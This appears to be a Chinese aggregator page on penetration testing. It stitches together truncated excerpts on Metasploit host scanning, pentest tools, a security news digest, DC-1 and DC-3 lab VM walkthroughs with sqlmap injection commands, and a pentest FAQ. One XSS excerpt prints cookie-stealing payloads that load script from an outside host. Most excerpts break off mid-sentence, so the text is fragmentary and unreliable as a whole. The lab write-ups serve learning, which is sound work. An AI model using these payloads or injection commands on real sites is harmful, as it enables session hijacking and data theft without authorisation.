渗透测试

利用Metasploit进行局域网活动主机扫描

梦想与她 提交于 2021-01-04 17:41:21
Metasploit中提供了一些辅助模块可用于活跃主机的发现,这些模块位于Metasploit源码路径的modules/auxiliary/scanner/discovery/目录中,主要有以下几个: 1.arp_sweep 2.ipv6_multicast_ping 3.ipv6_neighbor 4.ipv6_neighbor_router_advertisement 5.udp_probe、udp_sweep。其中两个常用模块的主要功能为: arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机。 udp_sweep通过发送UDP数据包探查指定主机是否活跃,并发现主机上的UDP服务。 我们在发送数据帧时要使用ARP协议(地址解析协议)将IP地址转化为MAC地址,因此我们可以使用发送APR请求来确定确定一个局域网中活跃主机。 代码如下: root @bt :~# msfconsole /*进入msfsonsole控制台 */ msf > use auxiliary/scanner/discovery/arp_sweep /*加载模块 */ msf > show options msf auxiliary(arp_sweep) > set RHOSTS 192.168.0.0/24 /*设置目标IP 此处扫描192.168.0网段的所 有主机*/ RHOSTS =>

Web安全趋势与核心防御机制

给你一囗甜甜゛ 提交于 2020-04-14 00:54:42
【今日推荐】:为什么一到面试就懵逼!>>> Web 安全趋势与核心防御机制 孟飞阳 2012年1月16日 一. WEB 安全技术产生原因 早期:万维网(World Wide Web)仅有Web站点构成,这些站点基本上是包含静态文档的信息库。这种信息流仅由服务器向浏览器单向传送。多数站点并不验证用户的合法性。 如今:已与早期的万维网已经完全不同,Web上的大多数站点实际上是应用程序。他们功能强大,在服务器和浏览器之间进行双向信息传送。他们处理的许多信息属于私密和高度敏感信息。因此,安全问题至关重要,Web安全技术也应运而生。 二. Web 程序常见漏洞 (1)不完善的身份验证措施:这类漏洞包括应用程序登陆机制中的各种缺陷,可能会使攻击者攻破保密性不强的密码,发动蛮力攻击或者完全避开登陆。 (2)不完善的访问控制措施:这一问题涉及的情况包括:应用程序无法为数据和功能提供全面保护,攻击者可以查看其他用户保存在服务器中的敏感信息,或者执行特权操作。 (3)SQL注入:攻击者可通过这一漏洞提交专门设计的输入,干扰应用程序与后端数据库的交互活动。攻击者能够从应用程序中提取任何数据、破坏逻辑结构,或者在数据库服务器上执行命令。 (4)跨站点脚本:攻击者可利用该漏洞攻击应用程序的其他用户、访问其信息、代表他们执行未授权操作,或者向其发动其他攻击。 (5)信息泄露:这一问题包括应用程序泄露敏感信息

最新最好的八款渗透测试工具

本小妞迷上赌 提交于 2020-04-07 04:46:02
如果说你的资产有可能被国内外的攻击者盯上并没有把你吓得半死,那就不必读这篇文章。如果你与我们大家一样也要面对现实,那么通过一名真正的专业人士在渗透测试方面给出的一些靠谱的预防性建议,试着采取一些挽救措施。 我们采访了渗透测试工具设计师/编程员/爱好者Evan Saez,他是纽约数字取证和网络安全情报公司LIFARS的网络威胁情报分析师,请他谈一谈最新最好的渗透测试工具,以及如何使用这类工具。 市面上现有的渗透测试工具 本文介绍的渗透测试工具包括:Metasploit、Nessus安全漏洞扫描器、Nmap、Burp Suite、OWASP ZAP、SQLmap、Kali Linux和Jawfish(Evan Saez是Jawfish项目的开发者之一)。这些工具为保护贵企业安全起到了关键作用,因为这些也正是攻击者使用的同一种工具。要是你没找到自己的漏洞并及时堵上,攻击者就会钻空子。 Metasploit是一种框架,拥有庞大的编程员爱好者群体,广大编程员添加了自定义模块,测试工具可以测试众多操作系统和应用程序中存在的安全漏洞。人们在GitHub和Bitbucket上发布这些自定义模块。与GitHub一样,Bitbucket也是面向编程项目的在线软件库。Saez说:“Metasploit是最流行的渗透测试工具。” 相关链接:http://www.metasploit.com

Hexo

寵の児 提交于 2020-04-04 04:45:53
(第91期) 安全动态: [安全动态] 网站被黑客攻击后,这家企业被罚钱了 https://mp.weixin.qq.com/s/0c84FC0iKxgXnm8Yu6VNXQ [安全动态] 关于漏洞挖掘的一些感想 https://mp.weixin.qq.com/s/pasGT9igsh8mT9_nEGpNaQ [安全动态] 一次面试经历有感而写的经验总结 https://mp.weixin.qq.com/s/cZU9t_k01bORo-EEfpooGw [安全动态] 推荐一些优秀的甲方安全开源项目 https://mp.weixin.qq.com/s/bviX7hXd3qvZPrlS0U1PYg [安全动态] Apache axis远程命令执行漏洞 https://mp.weixin.qq.com/s/QYS8k7O0cXRnaMPIQm5vOg [安全动态] 工信部发布《电信和互联网行业提升网络数据安全保护能力专项行动方案》 https://mp.weixin.qq.com/s/-gX-WpLuZXjiCIcXD0dumA [安全动态] 公安机关网络安全等级保护监督检查工作内容 https://mp.weixin.qq.com/s/lEMy_xrTRZUNVM7AAbp8Pg [安全动态] 判刑相关汇总 https://mp.weixin.qq.com/s

国外整理的一套在线渗透测试资源合集

五迷三道 提交于 2020-03-23 07:58:11
3 月,跳不动了?>>> http://bobao.360.cn/news/detail/1132.html 在线资源 渗透测试资源 Metasploit Unleashed - 免费的metasploit教程 PTES - 渗透测试执行标准 OWASP - 开放式Web应用程序安全项目 OSSTMM - 开源安全测试方法手册 Shell 脚本资源 LSST - linux shell脚本教程 Linux 资源 Kernelnewbies - 一个出色的Linux内核资源的社区 Shellcode 开发 Shellcode Tutorials - 如何编写shellcode的教程 Shellcode examples - Shellcodes 的库 社工资源 Social Engineering Framework - 一些社工的资源 开锁资源 Schuyler Towne channel - 开锁视频和安全沙龙 工具 渗透测试系统版本 Kali - 一个Linux发行版,用来做数字取证和渗透测试。 NST - 网络安全工具包发行版 Pentoo - 着眼于安全的基于Gentoo的 LiveCD BackBox - 基于Ubuntu的发行版,用于渗透测试及安全评估 渗透测试基础工具 Metasploit - 应用最广的渗透测试软件 Burp - 抓包工具,针对Web应用执行安全检测

xss之渗透测试

一世执手 提交于 2020-03-14 23:10:52
跨站脚本攻击:cross site script execution(通常简写为xss,因css与层叠样式表同名,故改为xss),是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式,很多人对于xss的利用大多停留在弹框框的程度,一些厂商对xss也是不以为然,都认为安全级别很低,甚至忽略不计,本文旨在讲述关于跨站脚本攻击的利用方式,并结合实例进行分析。 我们构造的获取cookie的xss脚本代码,已经成功的提交到了网站后台。 代码: </textarea>'"><script src=http://x.imlonghao.com/3E3nja?1371821300></script> 或者 </textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fx.imlonghao.com%2F3E3nja%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName

DC_1

被刻印的时光 ゝ 提交于 2020-03-11 17:09:19
声明 本人为初学者,所以,参考了很多网上的骚操作,希望有一天能自己上!加油!!! 这是前几天再看大佬博客发现的vulnhub里面的一个项目,然后就自己试了下,有什么需要改进的地方,欢迎大家普及。 环境 由于没有安装virtual Box的原因,所以直接用vm打开的,决定后期安装virtual,将网卡调成NAT模式,然后开启虚拟机,不需要登录(也进不去) 渗透测试 0x00 前提 不知道IP地址,但是知道在同一个网段 0x01 nmap扫描一波 namp -Pn 192.168.114.0/24 总共就开了两个虚拟机,2是kali的地址,理所当然1就是我们的目标IP地址了。 0x02 nmap -A -p- -T4 192.168.114.145 -A: 使能系统探测、版本检测、脚本扫描、路由追踪 -T<0-5>: 时间模板,越大速度越快 -p: 指定端口扫描范围 一段时间后······· 主机开启了80、22、还有111端口(nfs共享) 可以看到上边的80端口信息,大概就是,开启了apache2,cms为Durpal 7. 0x03 然后尝试了一下注册的地方,由于技术有限,所以,嗯,没办法绕过,但是可以知道,是存在admin用户的,但是会过滤or、and等非法字符串防止绕过。 然后尝试注册一个普通用户aaa,嗯,,,这可能是正常步骤 0x04 想到反正admin用户是存在的,那就

渗透测试学习之靶机DC-3

别说谁变了你拦得住时间么 提交于 2020-03-11 10:13:30
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24 ,得到目标主机IP:192.168.246.140 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.140 web站点的相关服务信息 3. joomscan 扫描站点 从站点信息得到使用joomal,使用joomscan获取信息: perl joomscan.pl -u http://192.168.246.140 4. 利用版本漏洞 查找joomla 3.7的相关漏洞信息: searchsploit joomla 3.7 查看3.7.0的sql注入相关用法信息: cat /usr/share/exploitdb/exploits/php/webapps/42033.txt 修改localhost为目标主机IP,获取数据库payload: sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] 获取joomladb中的表payload: sqlmap -u "http

渗透测试工作流程渗透测试类型法律边界

不羁的心 提交于 2020-03-09 10:26:07
渗透测试工作流程渗透测试类型法律边界 渗透测试工作流程 渗透测试与其它评估方法不同。通常的评估方法是根据已知信息资源或其它被评估对象,去发现所有相关的安全问题。渗透测试是根据已知可利用的安全漏洞,去发现是否存在相应的信息资源。相比较而言,通常评估方法对评估结果更具有全面性,而渗透测试更注重安全漏洞的严重性。渗透测试通常有七个阶段,如下所示本文选自 Android渗透测试入门教程大学霸 : q 前期交互阶段:该阶段通常是用来确定渗透测试的范围和目标的。 q 信息收集阶段:在该阶段需要采用各种方法来收集目标主机的信息,包括使用社交媒体网络、 Google Hacking 技术、目标系统踩点等。 q 威胁建模阶段:该阶段主要是使用信息收集阶段所获取到的信息,来标识出目标系统上可能存在的安全漏洞与弱点。 q 漏洞分析阶段:在该阶段将综合从前面几个环节中获取到的信息,从中分析和理解那些攻击途径是可行的。特别是需要重点分析端口和漏洞扫描结果,截取到服务的重要信息,以及在信息收集环节中得到的其它关键信息。 q 渗透攻击阶段:该阶段可能是在渗透测试过程中最吸引人的过程。然而在这种情况下,往往没有用户所预想的那么一帆风顺,而往往是曲径通幽。在攻击目标主机时,一定要清晰地了解在目标系统上存在这个漏洞。否则,根本无法攻击成功。 q 后渗透攻击阶段:该阶段在任何一次渗透过程中都是一个关键环节

渗透测试网站漏洞客户问题分析

旧街凉风 提交于 2020-03-09 10:09:29
这几天在2020RSAC安全行业盛会上听了一名渗透大佬的经验分享,感觉得益匪浅。 一、渗透测试服务中的常见问题 1、对客户网站系统,之前在其他几家安全公司做过 渗透测试服务 ,那么我们接手的话要如何进行?深入深入分析客户程序,认真细致发现程序全方位、深层次漏洞。 2、如果客户的程序,部署了环境waf防火墙服务,我们要如何进行?还可以绕过web防火墙采取渗透测试,比如还可以通过内部局域网的技术手段去测试等。客户现有的网站安全防护,未必安全,非常容易被绕过。 3、客户程序,使用ukey硬件设备登录认证,还需要安全渗透测试吗? Ukey硬件设备的安全性也需要验证安全测试,之前有过此设备发送一个验证后,随后这个验证还可以重复使用的情况。 4、客户程序,网络层协议是用的SSL证书加密传输的,传输数据这里也做了rsa加密导致截取不到数据包,接下来该怎么办? 试着一些常用到的破解方式,比如对https证书伪造,协议重置,对授权程序采取渗透测试时,千万不要去测试没有经过授权的系统哦. 5、客户网站程序,似乎是静态网页,无法进入渗透测试。我该怎么办? 网站中不断的去抓数据包分析,然后去寻找有动态脚本交互功能的地方查找问题。 6、客户的系统程序,我们需不需要上网站漏洞扫描器采取扫描? 尽量不要用漏洞扫描器,降低对客户现有正在运行系统的伤害,特别是比较敏感关键程序,也别内网渗透。比较敏感程序采取测试